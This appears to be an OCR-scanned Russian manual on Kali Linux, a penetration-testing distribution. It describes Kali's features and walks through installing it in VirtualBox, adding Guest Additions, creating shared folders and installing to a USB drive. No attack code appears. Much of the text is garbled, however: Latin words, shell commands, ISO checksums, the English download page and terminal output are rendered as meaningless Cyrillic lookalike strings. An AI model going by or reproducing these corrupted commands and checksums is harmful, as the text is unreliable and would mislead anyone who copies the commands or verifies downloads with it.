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Об этой книге 

Эта книга — пособие по Каіі Ыпих на русском языке. В этой книге собраны самые 
интересные материалы с сайта ѴѴеЬѴѴаге.Ьіг . Источником материалов сайта 
ѴѴеЬѴѴаге.Ьіг являются: переводы англоязычных ресурсов — книг и веб-сайтов 
(основной источник), а также собственный опыт. 

Смысл составления этой книги — систематизация знаний, накопленных на сайте. 

На сайте ѴѴеЬѴѴаге.Ыг ещё больше материала, в том числе и по Каіі Ыпих. Весь 
материал также бесплатен. Статьи являются «побочным продуктом» моего обучения. Я 
изучаю системное администрирование операционной системы Ыпих и веб-серверов на 
основе Ыпих, для анализа качества настройки используются разнообразные сканеры, 
инструменты аудита, методы тестирования на проникновение и прочее — именно то, 
что собрано в Каіі Ыпих. И актуальной и качественной информации по этим вопросам 
на русском языке мало. Основные источники её получения — англоязычные книги и 
англоязычные веб-сайты. Даже в англоязычных книжках, которые продаются по 30-50 
баксов, есть и устаревшая информация, и нерабочие примеры. Одна из книг по Каіі 
І_іпих оказалась какой-то старой переделкой книги о ВаскТгаск — в некоторых местах 
авторы даже забыли поменять ВаскТгаск на Каіі Ыпих. Это также говорит о качестве 
подготовки и читке перед выпуском. 

Поэтому изучение англоязычных источников — это не просто чтение. Это: чтение, 
попытка реализовать, исправление ошибок и неточностей. Чтобы сохранить 
полученные данные и закрепить знания, я создаю свой собственный архив 
на ѴѴеЬѴѴаге.Ьіг . Хочу предупредить, что на сайте много описок, орфографических 
ошибок, неточностей перевода. Поэтому, если он вам нравится как есть — буду рад вас 
видеть. У меня нет времени работать корректором и бесконечно вычитывать статьи и 
шлифовать стиль. Не хватает времени для оформления новых статей, который я делаю 
на голом энтузиазме. У меня есть настоящая работа, за которую получаю деньги. 

Кстати о деньгах, если вам хочется, чтобы у меня было чуть больше времени на 
подготовку новых статей, то вы можете сделать денежное 
пожертвование ЬіТрУ/ѵѵеЬѵѵаге.Ьіг/Ррайе ісІ=27 . Если лишних денег у вас нет, но есть 
материал, которым хотите поделится, то посмотрите здесь Ьі:1:р://ѵѵеЬѵѵаге.ЬІ2/?р=3327, 
возможно, вас это заинтересует. 
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Часть 1. Общая информация и установка КаМ Ыпих 
Глава 1. Что Такое Каіі Ыпих? 

Каіі Ыпих является передовым Ыпих дистрибутивом для проведения тестирования на 
проникновение и аудита безопасности. 

Особенности Каіі Ыпих 

Каіі является полной повторной сборкой ВаскТгаск Ыпих — \л/\л/\л/.Ьаск1:гаск-Ііпих.ог§, 
полностью придерживаясь стандартов разработки ОеЬіап. Вся новая инфраструктура 
была пересмотрена, все инструменты были проанализированы и упакованы, и мы 
перешли на (Зіі для наших ѴС5. 

• Более 300 инструментов для проведения тестирования на проникновение: 

После рассмотрения каждого инструмента, который был включен в ВаскТгаск, 
мы устранили большое количество инструментов, которые либо не работают 
или дублируют другие инструменты, с похожей функциональностью. 

• Бесплатный и всегда будет бесплатным: Каіі Ыпих, как и его предшественник, 
является полностью бесплатным и всегда будет таким. Вам никогда, не придется 
платить за Каіі Ыпих. 

• Сіі дерево с открытым источником кода: Мы ярые сторонники программного 
обеспечения с открытым источником кода и наше дерево разработки доступно 
для всех, и все источники доступны для тех, кто желает настроить или 
перестроить пакеты. 

• РН5 совместимый: Каіі был разработан, чтобы придерживаться Рііезузіет 
НіегагсИу ЗТапсІагсІ, что позволяет всем пользователям Ыпих легко найти 
исполняемые файлы, файлы поддержки, библиотеки и т.д. 

• Обширная поддержка беспроводных устройств: Мы построили Каіі Ыпих для 
поддержки как можно большего количества беспроводных устройств, что 
позволяет ему правильно работать с широким спектром аппаратных устройств и 
делает его совместимым с многочисленными 115В и другими беспроводными 
устройствами. 

• Специальное ядро пропатчено от инъекций: Как пентестерам, разработчикам 
часто необходимо проводить аудит беспроводных сетей, поэтому в наше ядро 
включены последние патчи. 

• Безопасная среда разработки: Команда разработчиков Каіі Ыпих состоит из 
небольшой группы доверенных лиц, которые могут записать пакеты и 
взаимодействовать с хранилищами только при использовании нескольких 
защищенных протоколов. 

• СРС подписанные пакеты и репозитории: Все пакеты Каіі подписываются 
каждым отдельным разработчиком, когда они создаются и записываются и 
репозитории впоследствии подписывают пакеты. 

• Многоязычность: Хотя инструменты для пентеста, как правило, написаны на 
английском языке, мы добились того, что у Каіі есть настоящая многоязычная 
поддержка, что позволяет большинству пользователей работать на родном 
язьже и находить инструменты, необходимые для работы. 
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• Полностью настраиваемый: Мы полностью понимаем, что не все будут 
согласны с нашими решениями дизайна, поэтому мы дали возможность нашим 
пользователям как можно проще настраивать Каіі Ыпих на свой вкус, вплоть до 
ядра. 

• Поддержка АКМЕІ. и АКМНР: АКМ-системы становятся все более и более 
распространенным и недорогими, и мы знали, что необходимо сделать 
поддержку Каіі для АКМ-систем в результате чего созданы рабочие инсталляции 
для АКМЕІ. и АКМНР систем. Каіі Ыпих имеет АКМ репозитории 
интегрированные с основным дистрибутивом, так инструменты для АКМ будут 
обновляться вместе с остальными дистрибутивами. Кали в настоящее время 
доступна для следующих АКМ-устройств: 

о гкЗЗОб тк/55808 

о КазрЬеггу Рі 

о ОРКОІРІІ2/Х2 

о Батзипй СбготеЬоок 

Каіі специально создана для тестирования на проникновение и, следовательно, вся 
документация на этом сайте, предполагает предварительное знание операционной 
системы Ыпих. 

Различия Между Каіі Ыпих и йеЫап 

Каіі Ыпих ориентирована на профессионалов в тестировании на проникновение и 
аудите безопасности. Таким образом, в ядре Каіі Ыпих был реализован ряд изменений, 
которые отражают эти потребности: 

Дизайн зіп§1е изег, гооі ассезз: в связи с характером аудита безопасности, Каіі Ыпих 
предназначен для использования в сценарии "$іп§1е, гооі: изег". 

Сетевые сервисы отключены по умолчанию: Каіі Ыпих содержит зузѵіпіі: Ьоокз, 
которые отключают сетевые сервисы по умолчанию. Эти Ітоокз позволяют 
устанавливать различные сервисы на Кали Ыпих, обеспечивая при этом то, что наш 
дистрибутив остается безопасным по умолчанию, независимо от того, какие пакеты 
установлены. Дополнительные сервисы, такие как ВІиеіооіИ, также в черном списке по 
умолчанию. 

Пользовательское Ыпих ядро: Каіі Ыпих использует ядро, пропатченое для 
беспроводной инъекций. 

Подходит ли Каіі Ыпих Именно Вам? 

От нас как от разработчиков, скорее всего, ожидают, что мы будем рекомендовать 
всем использовать Каіі Ыпих. Однако, Каіі дистрибутив Ыпих специально 
разработанный для профессионального тестирования на проникновение и аудита 
безопасности и, таким образом НЕ рекомендуется для тех, кто незнаком с Ыпих. 

Кроме того, неправильное использование средств безопасности в вашей сети, в 
частности, без разрешения, может нанести непоправимый ущерб и привести к 
значительным последствиям. 
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Тестирование на проникновение с помощью Каіі Ыпих 2.0 


Глава 2. Как установить Каіі Ыпих: подробная инструкция для 
установки на компьютер и в виртуальную машину 

В виртуальной машине невозможно использовать встроенный И /і-Рі, можно 
использовать только ІІ5В И /і-Рі карты. Поэтому рекомендуется ознакомиться со 
статьёй « Лучшие совместимые с Каіі ііпих ІІ5В И /і-Рі адаптеры ». 

Установка Каіі Ыпих 2.x и Каіі Ыпих 1.x 

Каіі Ыпих — это дистрибутив, основанный на Ыпих ОеЬіап. Его особенностью является 
то, что в нём собрано огромное количество инструментов, говоря простыми словами, 
«для хакеров». Т.е. здесь вы найдёте разнообразные сканеры для получения 
информации и поиска уязвимостей, программы для подборов паролей и обратной 
инженерии, инструменты для социальной инженерии и углублённого теста на 
проникновение веб-систем и т. д. Краткому обзору разделов Каіі Ііпих будет посвящена 
вторая часть данной статьи, а подробно каждый инструмент будет рассмотрен в 
отдельных ближайших статьях — заходите на ѴѴеЬѴѴаге.Ыг почаще, а ещё лучше — 
подписывайтесь тем или иным способом на наши новости — на К55-ленту, через е-таіі 
уведомления или в социальных сетях. 


Пока вы читаете вводные слова, перейдите на домашнюю страницу Каіі Ііпих и 
бесплатно скачайте её для себя: 



СЖісіаІ Каіі Ыпих Эоѵѵпіоасів 

Уои сап сіоѵѵпіоас] оЯісіаІ Каіі Ыпих геіеазез Ггот ІЬе ТоІІоѵѵіпд Ііпкз: 


оотаоАО ѵоіт ріаѵоіш ор каі_і иных 


ІМА6Е ЫАМЕ 

ѴЕКЗІОЯ 

йІКЕСТ 

ТОККЕЯТ 

512Е 

ЗНА151ІМ 

Каіі Еіпих 64 Ьі( 130 

1.0.9а 

130 

Тоггепі 

2.96 

2744Р50156сЗ(16332Ьс75е676136аа(13058(10аа(1 

Каіі Упих 32 Ьіі 130 

1.0.9а 

130 

Тоггепі 

3.06 

89асеТ59694аЬс68580а681ЬЬ466355Г6а31МЬ6 

Каіі Упих АКМЕІ_ Ітаде 

1.0.9а 

Ітаде 

Тоггепі 

2.16 

5е98е48а26с8771аЗаЬ28 8Ьсс62еЬ69 93с4с2139 

Каіі Упих АКМНР Ітаде 

1.0.9а 

Ітаде 

Тоггепі 

2.06 

06а849Ь325е 397е1703Ь8 е2769с472а 71215311 с 


ТКУ5ТЕО СОЯТШВІІТЕО ѴМѴѴАКЕ АИР АКМ ІМАСЕ5 ВѴ ОРРЕЯ5ІѴЕ 5ЕСУШТѴ 


ТЬе дооЬ Іоікз аі СЖепзіѵе Зесигііу (ѵѵЬо аге аізо Йіе Типсіегз. ІоипЬегз. апЬ Ьеѵеіорегз о( Каіі Ыпих) Ьаѵе депегаіесі аііегпаіе Яаѵоигз оТ Каіі изіпд ІЬе зате Ьиіій 
іпЯ’азІгисІиге аз ІЬе оШсіаІ Каіі геіеазез. Зауіпд ІЬіз, ІЬезе ітадез аге сопзіЬегей *ипо№сіаГ апй ѵѵіІІ Ье таіпіаіпей оп а Ьезі еІТоП Ьазіз Ьу (Жепзіѵе Зесигііу. 
йие Іо Ше еѵег іпсгеазіпд атоипі оі АКМ ітадез. ѵѵе Ьаѵе зерагаіесі ІЬезе сіошпіоасіз Ггот ІЬе оЯісіаІ Каіі 130 ітадез. ѴМѴѴаге апс! АКМ Каіі ітадез ргосіисесі 
Ьу ООепзіѵе Зесигііу сап поѵкг Ье ІоипсІ аі ІЬе ОЯепзіѵе Зесигііу Каіі Ыпих АКМ апЬ ѴМѴѴаге Ітадез раде. 


ОРРІСІАІ. КАП МІККОН5 


шшшш 


ІІЧЕОПМАТІК 

ІШТН \СНЕЫ 
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Тестирование на проникновение с помощью КаМ Ыпих 2.0 


В зависимости от битности вашего компьютера, выберете версию Каіі Ыпих 64 ЬіТ 150 
или Каіі Ыпих 32 Ьіі: 150. Скачать можно как напрямую с зеркал, так и через торрент 
(скачивайте через торрент — пожалейте их сервера). 

Из-за своего специфического назначения, Каіі Ыпих не совсем подходит в качестве 
домашней системы (хотя Линукс он и есть Линукс — можно доставить дополнительные 
пакеты и вполне себе пользоваться, особенно, если основной вашей деятельностью 
является анализ на проникновение и прочее подобное. 

Оптимальным является использование Каіі Ыпих в виде Ыѵе-дистрибутива или 
установки на виртуальную машину (можно использовать Ыѵе-дистрибутив на 
виртуальной машине). Я установлю Каіі Ыпих в виртуальную машину, т. к. хочу 
обновлять компоненты (программы) и сохранять данные (профили, отчёты). 

Если у вас ещё нет ѴігІиаІВох, то перейдите на страницу скачивания с официального 
сайта (программа бесплатная). 

В ѴігІиаІВох нажимаем «Создать». В поле для имени вводите любое имя, выбираете 
тип ОС (Ыпих) и выбираете версию (выбор версии не играет особой роли — она 
используется только для рекомендации размеров дискового накопителя и выделяемой 
виртуальной машине оперативной памяти). У меня получилось так (я выбрал ОеЬіап, 
т. к. Каіі Ыпих основана именно на нём): 



Далее выбираете объём оперативной памяти, выделяемой для виртуальной машины 
— можете оставить рекомендуемый, а можете добавить. Главное правило — оставьте 
достаточно памяти для реального компьютера, на котором запущен ваш ѴігІиаІВох, 
иначе весь компьютер, а вместе с ним и ѴігІиаІВох начнут страшно тормозить: 
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Тестирование на проникновение с помощью КаМ Ыпих 2.0 



В следующем окне у нас спрашивают о дисковом накопителе — ничего менять не 
нужно, мы создадим новый виртуальный жёсткий диск (если вы собираетесь 
использовать Ыѵе-дистрибутив, то выберете «Не подключать виртуальный жёсткий 
диск»): 


Создать виртуальную машину 


Выберите жёсткий диск 

При желании к новой виртуальной машине можно подключить виртуальный 
жёсткий диск. Вы можете создать новый или выбрать из уже имеющихся. 

Если Вам необходима более сложная конфигурация Вы можете пропустить этот 
шаг и внести изменения в настройки машины после её создания. 

Рекомендуемый объём нового виртуального жёсткого диска равен 8,00 ГБ. 

О Не подключать виртуальный жёсткий диск 

(•) Создать новый виртуальный жёсткий диск 

1 ) Использовать существующий виртуальный жёсткий диск 

ипихМіпЮппатоп.ѵсіі (Обычный, 30,00 ГБ) - 0 


Создать 


Отмена 


В следующем окне опять ничего не трогаем: 
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Тестирование на проникновение с помощью КаМ Ыпих 2.0 


Создать виртуальный жесткий диск 


Укажите тип 

Пожалуйста, укажите тип файла, определяющий формат, который Вы хотите использовать при создании 
нового диска. Если у Вас нет необходимости использовать новый диск с другими продуктами программной 
виртуализации. Вы можете оставить данный параметр как есть. 

(•) ѴТ>І (ѴііТиаІВох Эізк Ітаде) 

О ѴІѴШК (ѴігТиаІ МасЫпе Оізк) 

О ѴНй (ѴігТиаІ НагсІ Эізк) 

О (РагаІІеІз НагсІ Оізк) 

О ёЕй (ОЕМІІ епбапсеё сіізк) 

О <ЗСОѴѴ (ОЕМІІ Сору-Оп-ѴѴгіГе) 




Скрьггь подробности 


Иехі 


Отмена 


В этом окне мы можем выбрать динамический или фиксированный жёсткий диск. Я 
категорически рекомендую оставить значение по умолчанию — т. е. динамический. 
Если вы выберете фиксированный и выберете размер, например 30 Гб, то это значит, 
что будет создан жёсткий диск размером именно 30 Гб, т. е. он займёт много места. 
Если же вы выбрали динамический, то созданный диск будет расширятся только по 
мере необходимости (например, после установки он будет 2-3 Гб), но в любой момент 
вы можете использовать заданное количество места: 


Создать виртуальный жёсткий диск 


Укажите формат хранения 


Пожалуйста уточните, должен ли новый виртуальный жёсткий диск подстраивать свой размер под размер 
своего содержимого или быть точно заданного размера. 

Файл динамического виртуального диска будет занимать необходимое место на Вашем физическом 
носителе информации лишь по мере заполнения, однако не сможет уменьшиться в размере если место, 
занятое его содержимым, освободится. 

Файл фиксированного виртуального диска может потребовать больше времени при создании на 
некоторых файловых системах, однако, обычно, быстрее в использовании. 

• Динамический виртуальный жёсткий диск 

О Фиксированный виртуальный жёсткий диск 


1 _ 


Иехі 


Отмена 
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Тестирование на проникновение с помощью Каіі Ыпих 2.0 


Теперь задаёте размер диска, не бойтесь поставить большое значение — если вы не 
будете использовать так много, какой размер задали, то виртуальный диск не будет 
расширяться до большого размера. Но вот если вы задали маленький размер и в какой- 
то момент у вас кончилось место, то можете считать, что у вас проблемы. Обязательно 
увеличьте размер диска до 10 Гб или более, иначе, вам просто не хватит места: 


ш 


Создать виртуальный жёсткий диск 


Укажите имя и размер файла 

Пожалуйста укажите имя нового виртуального жёсткого диска. 


Каіі І_іпих 


іа 


Укажите размер виртуального жёсткого диска. Эта величина ограничивает размер файловых данных, 
которые виртуальная машина сможет хранить на этом диске. 


=0 


30І.00 ГБ 


4,00 МБ 


2,00 ТБ 


Создать 


Отмена 


В этом же окошечке укажите желаемое имя и расположение виртуального жёсткого 
диска: 


171 Система 

Оперативная память: 4096 МБ 
Процессоры: 2 

Порядок загрузки: Дискета, 

Ускорение: ѴТ-х/АМО 




Создать виртуальный жёсткий диск 


Укажите имя и размер файла 


Укажите местоположение нового виртуального жёсткого диска 


® 


ф ► Компьютер ► Новый том (Н:) 


Упорядочить ^ 


Создать папку 
А Имя 


Поиск Новый том (Н:) Р 

ш - # 


Домашняя группа 

* 'Щ Компьютер 

^ Локальный диск 
ѵ* 2ПСІНОР (Р:) 


Новый том (Н:) 


* Ч0Ц» Сеть 
Ч МІАЬРС 


к ~ 

і Зй (торренты) 
к АгИ 
г РгорЬох 
к Ыпих 

I ТСБоШаіг.2012 
I Ѵісіео 

I ѴѴіпсІоѵѵ5 8.1 МіКбХіЗ Рго N х64 Виіісі 96... 
і Аудиокниги 

Саѵапц _ 


Дата изменения 

16.03.2014 11:31 
18.08.2013 9:20 
22.08.2013 13:40 
18.10.2014 4:24 
14.02.2014 8:17 
17.06.2014 6:30 
21.09.2014 10:34 
25.01.2014 7:14 
18.01.2014 15:33 
п»; па эти 


Тип 

Папка с файлами 
Папка с файлами 
Папка с файлами 
Папка с файлами 
Папка с файлами 
Папка с файлами 
Папка с файлами 
Папка с файлами 
Папка с файлами 


Размер 


Имя файла: Каіі Ыпих 


Тип файла: ѴРІ (*.ѵсіі) 


з 


- Скрыть папки 

I 


Сохранить 


Отмена 

■Л 
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Тестирование на проникновение с помощью КаМ Ыпих 2.0 


Думаю, у вас уже докачался ваш дистрибутив Каіі Ыпих, у меня скачался каталог каіі- 
Ііпих-1.0.9а-атсІ64, а в нём два файла, нас интересует только файл каІі-Ііпих-1.0.9а- 
атсІ64.І5о. 


Нажимаем Запустить виртуальную машину. Нас просят выбрать реальный дивиди-ром 
или указать расположение образа диска, выбираем наш скаченный образ Каіі Ыпих: 



И нажимаем продолжить: 


Ца Каіі 1_іпих [Выключена] - Огасіе ѴМ ѴігТиаІВох 

Машина Вид Устройства Справка 


_ П 



Ш 


> 

(±) КідНІ 5И« 
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Тестирование на проникновение с помощью Каіі Ыпих 2.0 


Если вы хотите запустить Ыѵе-версию (чтобы посмотреть или попробовать), то 
выбираете этот пункт. Меня сейчас интересует пункт ІпзТаІІ (установка): 



тш ноши 


ВооТ тени 

Ьіс>е (атД64) 

ІЛс>е (атД64 ГаіІзаГе) 

Ьіое (Гогелзіс тоДе) 

І-іое 1)ЗВ Рег8 і зрелее (сЬеск ка 1 і . огд/ргзі) 

І-іѵе ЦЗВ ЕлсгуріеД Регзізіелсе (сЬеск ка1і.огд/ргзі) 

Іпзіаі1 


Ргезз ЕМТЕВ іо ЬооТ ог ТАВ іо еДіІ а тели елігу 


Выбираете свой язык, раскладку клавиатуры, способ переключения между русской и 
латинской раскладкой. 


Придумайте любое имя вашего компьютера: 



<ТаЬ>перехоа по элементам; <Пробел>выбор; <ЕпТег>активация кнопок 


По материалам сайта ѴѴеЬѴѴаге.Ьіі 


15 

















Тестирование на проникновение с помощью Каіі Ыпих 2.0 


И имя домена: 



<ТаЬ>переход по элементам; <Пробел>выбор; <Еп1ег>активация кнопок 


Пароль рута (что угодно, но не пустое): 


[!!] Настройка учётных записей пользователей и паролей 

Необходимо ввести пароль учётной записи суперпользователя (гооТ), используемой для 
администрирования системы. Доступ к компьютеру с использованием этой учётной записи 
злонамеренных или низкоквалифицированных пользователей может привести к катастрофическим 
последствиям. Поэтому пароль суперпользователя не должен легко угадываться, подбираться 
по словарю, и он не должен быть связан с вашей личностью. 

Хороший пароль представляет из себя смесь букв, цифр и знаков препинания, и должен 
периодически меняться. 

Пароль учётной записи суперпользователя не должен быть пустым, иначе она будет 
заблокирована, а настроенной в программе установки пользовательской учётной записи будет 
разрешено работать с правами суперпользователя через команду "зибо". 

Во время ввода пароля вводимые символы не будут отображаться на экране. 

Пароль суперпользователя: 


111 


<Вернуться> 


<Продолжить> 


<ТаЬ>переход по элементам; <Пробел>выбор; <Еп1:ег>активация кнопок 
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Тестирование на проникновение с помощью Каіі Ыпих 2.0 


Выбираете часовой пояс. Разметка дисков — ничего менять не нужно. 
Предупреждение (если ставите на виртуальную машину, то просто нажимаете Епіег): 


-1 [!!] Разметка дисков |- 

Программа установки может провести вас через процесс разметки диска (предлагая разные 
стандартные схемы) на разделы, либо это можно сделать вручную. Если выбрать использование 
инструмента управления разметкой, у вас всё равно будет возможность позже посмотреть и 
подправить результат. 

Если выбрать использование инструмента управления разметкой всего диска, то далее вас 
попросят указать нужный диск. 

Метод разметки: 


Ійвто - использовать весь диск 


йвто - использовать весь диск и настроить ЬѴМ 
йвто - использовать весь диск с шифрованным І_ѴМ 
Вручную 

<Вернуться> 


<ТаЬ>перехоа по элементам; <Пробел>выбор; <Еп1:ег>активация кнопок 


Ещё раз просто нажимаете Епіег: 


-1 [!!] Разметка дисков |- 

Заметим, что все данные на выбранном диске будут стёрты, но не ранее чем вы подтвердите, 
что действительно хотите сделать изменения. 

Выберите диск для разметки: 


ІСЗІЗ (0.0,0) (5СІа) - 32.2 6В ЙТЙ ѴВОХ НЙКРРІЗИ 


<Вернуться> 


<ТаЬ>переход по элементам; <Пробел>выбор; <Еп1:ег>активация кнопок 


И ещё раз. В следующем окне переключаетесь на «Да»: 
По материалам сайта ѴѴеЬѴѴаге.Ьіі 
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-1 [!!] Разметка дисков |- 

Если вы продолжите, то изменения, перечисленные ниже, будут записаны на диски. Или же вы 
можете сделать все изменения вручную. 

На этих устройствах изменены таблицы разделов: 

ЗСЗІЗ (0,0,0) (зсіа) 

Следующие разделы будут отформатированы: 

раздел #1 на устройстве ЗСЗІЗ (0,0,0) (зсіа) как ех!4 
раздел #5 на устройстве ЗСЗІЗ (0,0,0) (зба) как подк 

Записать изменения на диск? 

ЕЙЯ <Нет> 


<ТаЬ>переход по элементам; <Пробел>выбор; <ЕпІег>активация кнопок 


Просто ждём, когда всё скопируется: 



После окончания установки появляется вот такое окно, нажимаем «Да»: 
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<ТаЬ>переход по элементам; <Пробел>выбор; <Еп1;ег>активация кнопок 


Предлагают сразу настроить прокси — я не буду это делать, т. к. ставлю Каіі Ыпих в 
образовательных целях и для сканирования своего локального сервера и своих сайтов: 



<ТаЬ>переход по элементам; <Лробел>выбор; <Еп1:ег>активация кнопок 


Скачиваются обновления программ (этот шаг можно пропустить, но лучше всё-таки 
скачать): 
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Нажимаем «Да»: 



Похоже, что данная система будет единственной на этом компьютере. Если это действительно 
так, то можно спокойно устанавливать системный загрузчик ЕКІІВ в основную загрузочную 
запись первого жёсткого диска. 

Внимание! Если программе установки не удалось обнаружить другую операционную систему, 
имеющуюся на компьютере, то изменение основной загрузочной записи приведёт к тому, что 
эту операционную систему некоторое время нельзя будет загрузить. Позднее можно будет 
настроить 6П1Ш для её загрузки. 

Установить системный загрузчик БИІІВ в главную загрузочную запись? 

<Вернуться> 


<ТаЬ>переход по элементам; <Пробел>выбор; <Епі:ег>активация кнопок 


Образ диска ,і$о должен извлечься автоматически, поэтому просто нажимаем 
«Продолжить»: 
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<ТаЬ>переход по элементам; <Пробел>выбор; <Еп*ег>активация кнопок 


Для входа используем имя 1 гооТ 1 и ваш пароль: 



Каіі Ыпих после завершения некоторых своих операций сама перезагрузится и теперь 
мы приступаем к следующей части — знакомимся с основными разделами 
инструментов . 
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Приложения Переход ^ І>- 1 

Каіі Упих 


Тор 10 ЗесигіТу Тооіз 


Аудио и видео 

Оу ІпГогтаІіоп СаШегіпд 

Ж Графика 

Г ^д ѴиІпегаЬіІІІу Апаіувіз 

Интернет 

> л» 

о 0 ѴѴеЬ АррІісаІІ0П5 

вв Любительское радио 

^ Ра$5ѵѵогсІ Аиаскз 

|дЦУ Офис 

ѴѴІгеІе$5 Аиаскз 

Программирование 

& Ехріоііаііоп Тооіі 

@ Системные 

5пі(Тіпд/5рооГіпд 

Специальные возможности 

> РЧ 

Маіпіаіпіпд Ассѳбб 

§ Стандартные 

Кеѵегзе Епдіпеегіпд 

ФФ Электроника 

•$|с 5Тге$5 ТеьТіпд 

^ Прочие 

И Нагсіѵѵаге Наскіпа 



ЩІ КерогТіпд Тооіз 
ІУУ ЗузГепп 5егѵісе$ 


Глава 3. Установка Дополнений гостевой ОС ѴігІиаІВох 


для Каіі Ыпих 2.0 


Если вы запускаете Каіі Ыпих в качестве «гостевой» системы в ѴігІиаІВох, эта статья 
поможет вам успешно установить инструменты «Дополнения гостевой ОС». 

Вы должны использовать ѴігІиаІВох версии 4.2.хх или выше, чтобы воспользоваться 
улучшениями, включающие обновления совместимости и улучшенную стабильность 
как основного приложения, так и Дополнений гостевой ОС. 


Установка Дополнений гостевой ОС ѴігІиаІВох для Каіі Ыпих 


Дополнений гостевой ОС ѴігІиаІВох обеспечивают надлежащую интеграцию мыши и 
экрана, а также общий доступ к каталогу с вашей основной операционной системой. 
Чтобы установить их, следуйте инструкции. 


Запустите вашу виртуальную машину с Каіі Ыпих, откройте окно терминала и наберите 
следующую команду для установки заголовков ядра Ыпих. 


1 


ар1-§е1; ирсіаіе && арІ-§е1: іпзіаіі -у Ііпих-1іеасіег5-$(ипате -г) 


Когда это завершено, вы можете подключить Сй-КОМ образ с «Дополнениями 
гостевой ОС». Выберите «Устройства» -> «Подключить образ диска Дополнений 
гостевой ОС». Это смонтирует 150 с Гостевыми дополнениями в виртуальный Сй 
привод вашей виртуальной машины Каіі Ыпих. Когда появиться предложение 
автозапуска СО, нажмите кнопку Отмена. 


Когда это завершено, вы можете подключить СО-КОМ образ с «Дополнениями 
гостевой ОС». Выберите «Устройства» -> «Подключить образ диска Дополнений 
гостевой ОС». Это смонтирует 150 с Гостевыми дополнениями в виртуальный СЭ 
По материалам сайта ѴѴеЬѴѴаге.Ьіі 
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привод вашей виртуальной машины Каіі Ыпих. Когда появиться предложение 
автозапуска СО, нажмите кнопку Отмена. 



Приложения 


На носителе «ѴВОХА00ІТЮМ5_5.0.0_10157 3» есть 
приложение, предназначенное для автоматического 
запуска. Запустить это приложение? 

Если вы не доверяете этому носителю или не уверены, нажмите «Отмена» 


Запустить 


шшт. 


жж. 


т 


Из окна терминала скопируйте файл ѴЬохЫпихАсІсІШопз.гип с СО-КОМ Гостевые 
дополнения в вашу локальную систему. Убедитесь, что он является исполнимым и 
запустите установку. 


1| 

ср /тесІіа/ссІгот/ѴВохипихАсІсІІ1;іоп5.гип /гооТ/ 

21 

сігтосі 755 /гооі/ѴВохІ-іпихАсІсІІІііопз.гип 

3| 

ссі /гооТ 

4| 

./ѴВохЫпихАсІсІМііопз.гип 
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гоо^@ѴѴеЬѴѴаге: ~ 


Файл Правка Вид Поиск Терминал Справка 


:-# ср /тесІіа/ссІгот/ѴВохІ-іпихАсІсІіТіопз . гип /гооТ/ 
г< :~# сЬтосі 755 /гооТ/ѴВохІ_іпихАсісІіТіопз . гип 

гооТіі; ! : — # ссі /гооТ 

гопТі Г.',' І'і.'.н' :~# ./ѴВохІ-іпихАсІсІіТіопз . гип 
ѴегіТуіпд агсЬіѵе іпТедгіТу... АН доосі. 

ІІпсотргеззіпд ѴігТиаІВох 5.0.0 СиезТ АсІсііТіопз Тог 1_іпих. 

ѴігТиаІВох СиезТ Асісііі: іопз іпзТаІІег 
Соруіпд асісіітіопаі ІпзТаІІег тосіиіез ... 

ІпзТаІІіпд асісіітіопаі тосіиіез . . . 

Ветоѵіпд ехізТіпд ѴігТиаІВох поп-ОКМЗ кегпѳі тосіиіез ...сіопе. 

Виіісііпд ТНе ѴігТиаІВох биезТ АсІсііТіопз кегпеі тосіиіез 

ТТіе Тіеасіегз Тог ТТіе сиггепТ гиппіпд кегпеі меге поТ ТоипсІ. ІТ ТЬе То11о\л/іпд 
тосіиіе сотріІаТіоп Таііз ТТіеп ТТііз соиісі Ье ТТіе геазоп. 

Виіісііпд ТТіе таіп СиезТ АсІсііТіопз тосіиіе ...сіопе. 

Виіісііпд ТТіе зТіагесі Тоісіег зиррогТ тосіиіе ...сіопе. 

Виіісііпд ТТіе ОрепСІ. зиррогТ тосіиіе ...сіопе. 

йоіпд поп-кегпеі зеТир оТ ТЬе СиезТ АсІсііТіопз ...сіопе. 

ЗТагТіпд ТЬе ѴігТиаІВох СиезТ АсІсііТіопз ...сіопе. 

ІпзТаІІіпд ТЬе Ѵѵ/іпсіохл/ ЗузТет сігіѵегз 
ІпзТаІІіпд Х.Огд Зегѵег 1.17 тосіиіез ...сіопе. 

ЗеТТіпд ир ТЬе Ѵі/іпсіоѵі/ ЗузТет То изе ТЬе СиезТ АсІсііТіопз ...сіопе. 

Уои тау пеесі То гезТагТ ТЬе ТЬе Міпсіоілі ЗузТет (ог ]изТ гезТагТ ТЬе диезТ зузТет) 
То епаЫе ТЬе СиезТ АсІсііТіопз. 

ІпзТаІІіпд дгарЬіс5 ІіЬгагіез апсі сіезкТор зегѵісез сотропепТз ...сіопе. 

г о о Ті і .V е ЬИ .іге :~# | 


Перезагрузите виртуальную машину Каіі Ыпих для завершения установки Гостевых 
дополнений. Теперь у вас должна быть полная интеграция машины и экрана, а также 
возможность расшаривать папки с главной системой. 

Создание общих папок с хостовой системой 

Этот раздел объясняет, как сделать общие каталоги между вашей основной системой и 
Каіі Ыпих ѴігТиаІВох запущенной в ѴігТиаІВох. 

Из главного окна ѴігТиаІВох выберите виртуальную машину Каіі Ыпих и кликните ссылку 
«Общие папки». Появится новое окно для добавления общих каталогов. 

Добавьте каталог, который вы хотите сделать общим, поставьте галочки «Авто¬ 
подключение» и «Создать постоянную папку» и нажмите ОК. 
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Ваши расшаренные папки теперь будут доступны в директории тесііа. Вы можете 


сделать закладку или ссылку для простого доступа в эту директорию. 



1 < 

> 0 тесііа 


01-И-ІМі • ® о 

© 

Недавние 

В 

В 

Л 

Домашняя папка 

сагот 

ссІготО 

5^_5 Ьаге 

а 

Рабочий стол 



В 

Видео 



□ 

Документы 



© 

Загрузки 



'О 

Изображения 



Л 

Музыка 



ш 

Корзина 



0 

Компьютер 



5а 

Обзор сети 



1 

Подключиться... 

и 



Глава 4. Как установить Каіі Ыпих на флешку и на внешний диск 

(простой способ) 

Преимущества установки Ыпих на флешку 

Преимуществ у установки Каіі Ыпих на флешку много: 

• возможность напрямую использовать всё железо компьютера (в том числе видеокарту, 
ѴѴІ-РІ устройства); 

• как следствие предыдущего пункта — повышенная производительность (по сравнению 
с виртуальной машиной; если флеш карта достаточно быстрая) и возможность 
задействовать ОРІІ для перебора хэшей или \Л/і-РІ-устройств для тестирования на 
проникновение \Л/і-РІ-сетей; 

• на компьютер не вносится никаких изменений — ни в загрузчик, ни на диски; 

• с одной флешки можно загрузиться на любом компьютере; 

• ваша Каіі Ыпих всегда с вами. 

